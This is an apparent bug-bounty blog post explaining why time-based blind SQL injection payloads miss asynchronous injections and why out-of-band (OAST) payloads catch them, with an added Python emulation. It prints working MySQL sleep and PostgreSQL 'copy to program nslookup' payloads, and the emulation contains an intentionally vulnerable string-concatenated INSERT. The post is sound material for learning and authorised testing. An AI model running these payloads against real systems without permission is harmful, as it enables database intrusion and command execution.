Super Blind SQL Injection - $20000 bounty | Thousands of targets still vulnerable
Core Concept
The time-based SQL injection payload
XOR(if(now()=sysdate(),sleep(5),0))XOR
fails to detect the injection even though the target is vulnerable to SQL injection.
The OAST-based (out-of-band) SQL injection payload below does detect it. But why?
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
Idea
I saw this tweet by Kanhaiya Sharma (the legend),
where he mentions the time-based SQL injection payload
XOR(if(now()=sysdate(),sleep(5),0))XOR
I found so many SQL injections with his payload.
So I started loving SQL injection, and to improve my knowledge further I revisited the PortSwigger SQL injection labs.
Lots of labs were solved with the time-based SQL injection payload mentioned above,
XOR(if(now()=sysdate(),sleep(5),0))XOR
but this lab could not be solved with time-based SQL injection payloads.
My assumption was that if the code is vulnerable to SQL injection, then a time-based SQL injection payload must work. I contacted lots of other hackers in the community (pro ones too) and asked whether, if the code is vulnerable to SQL injection, it is possible that a time-based payload will not detect the SQLi. Everyone said it's impossible that a time-based payload would not detect it.
I checked lots of other hackers' Intruder SQL injection wordlists, but none of them used payloads based on out-of-band (OAST) techniques.
This made me curious. Lots of hackers are not using OAST-based SQL injection payloads, and only an OAST-based payload solves this PortSwigger lab, so there may be other targets in the wild that are vulnerable in the same way but have gone undetected because nobody is testing them with OAST-based payloads. But the question remained: why does the time-based payload not work? I carefully re-read the PortSwigger SQL injection study material and found the answer.
The answer is written in the PortSwigger material.
Let me explain what is written there with an example.
Have you ever heard of blind XSS? It is the same idea.
Say you send this request to the server:
https://example.com/?q={sqli}
The server processes the q parameter securely with a parameterized query and sends you the response.
But afterwards the server also saves the value of q, i.e. {sqli}, to the database, for example for analytics, and this second query is the one that is vulnerable to SQL injection.
You will never detect this with a time-based SQLi payload, because your response arrives in the normal time: the vulnerable query runs after the response has already been sent (or in a separate thread), so the sleep() it triggers never delays the response you are measuring.
But if you use an OAST SQLi payload here, you get a DNS interaction from the injected query whenever it runs, and that tells you the code is vulnerable to SQL injection. OAST SQLi payload for PostgreSQL (from the PortSwigger cheat sheet, https://portswigger.net/web-security/sql-injection/cheat-sheet):
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
Note that both payloads are database-specific: sleep() and sysdate() are MySQL functions, while COPY ... TO PROGRAM is PostgreSQL-only and executes only when the application's database user is a superuser or holds the pg_execute_server_program role. The cheat sheet lists equivalent OAST payloads for the other databases (Oracle, Microsoft SQL Server, MySQL), so test the ones matching the backend you suspect rather than a single payload.
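To make the asynchronous case concrete, here is an added Python emulation of the scenario above. It is example code written for this page, not code from the post or from PortSwigger. The request is served by a safe, parameterized SELECT, and the analytics INSERT that concatenates the search term runs in a background thread. So that it runs offline, two SQLite functions are registered as constructed stand-ins: sleep() for MySQL's SLEEP(), and oast_ping() for the DNS lookup that a real `nslookup BURP-COLLABORATOR-SUBDOMAIN` payload would trigger. The tables, the `x'||...||'` payload shape (SQLite string concatenation, used instead of the MySQL XOR form) and the Collaborator hostname are all assumptions for the demo.

```python
import sqlite3
import threading
import time

# Constructed stand-ins for the side effects the real payloads rely on:
# sleep(n) plays the role of MySQL's SLEEP(); oast_ping(host) plays the role
# of the DNS lookup that `nslookup BURP-COLLABORATOR-SUBDOMAIN` would cause.
SLEEP_LOG = []   # every sleep() call the database actually executed
DNS_LOG = []     # every "DNS lookup" the database actually made


def _sleep(seconds):
    SLEEP_LOG.append(seconds)
    time.sleep(seconds)
    return 0


def _oast_ping(host):
    DNS_LOG.append(host)   # the real thing would hit the attacker's DNS server
    return 0


# One shared in-memory database; the lock serialises access between threads.
conn = sqlite3.connect(":memory:", check_same_thread=False)
lock = threading.Lock()
conn.create_function("sleep", 1, _sleep)
conn.create_function("oast_ping", 1, _oast_ping)
with lock:
    conn.execute("CREATE TABLE products(name TEXT)")
    conn.execute("CREATE TABLE search_log(term TEXT)")
    conn.executemany("INSERT INTO products VALUES (?)", [("apple",), ("pear",)])
    conn.commit()


def _log_search_async(term):
    """Analytics writer running in a background thread. This is the bug:
    the search term is concatenated straight into the INSERT."""
    sql = "INSERT INTO search_log(term) VALUES ('%s')" % term
    with lock:
        conn.execute(sql)
        conn.commit()


def handle_request(q):
    """Emulates GET /?q=<q>: a safe, parameterised search whose result is
    returned immediately, plus an asynchronous (vulnerable) analytics write.
    Returns (rows, seconds the client waited, the background thread)."""
    start = time.monotonic()
    with lock:
        rows = conn.execute(
            "SELECT name FROM products WHERE name LIKE ?", ("%" + q + "%",)
        ).fetchall()
    worker = threading.Thread(target=_log_search_async, args=(q,), daemon=True)
    worker.start()
    return rows, time.monotonic() - start, worker


def time_based_probe(delay=0.5):
    """Time-based detection: flags SQLi only if the response is delayed."""
    payload = "x'||sleep(%s)||'" % delay   # -> VALUES ('x'||sleep(0.5)||'')
    _, elapsed, worker = handle_request(payload)
    worker.join()                          # let the background write finish
    return elapsed >= delay


def oast_probe(host="BURP-COLLABORATOR-SUBDOMAIN"):
    """OAST detection: flags SQLi if the database looked up our host at all,
    no matter when or in which thread the injected query ran."""
    payload = "x'||oast_ping('%s')||'" % host
    _, _, worker = handle_request(payload)
    worker.join()                          # stands in for polling Collaborator
    return host in DNS_LOG


if __name__ == "__main__":
    print("time-based probe detected SQLi:", time_based_probe())  # False
    print("sleep() was nevertheless executed:", SLEEP_LOG)       # [0.5]
    print("OAST probe detected SQLi:", oast_probe())             # True
```

The time-based probe reports nothing because the response is timed before the background INSERT runs, even though SLEEP_LOG shows that the injected sleep() did execute. The OAST probe does not care when the query runs; the lookup in DNS_LOG is the evidence.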
Hunting
I started hunting with OAST SQLi payloads and found lots of SQL injections that could not be found with time-based SQLi payloads.
The total bounty I made with OAST-based SQL injection alone was $20000 in one month.
Conclusion
Use OAST-based SQLi payloads if you want to find more SQL injections.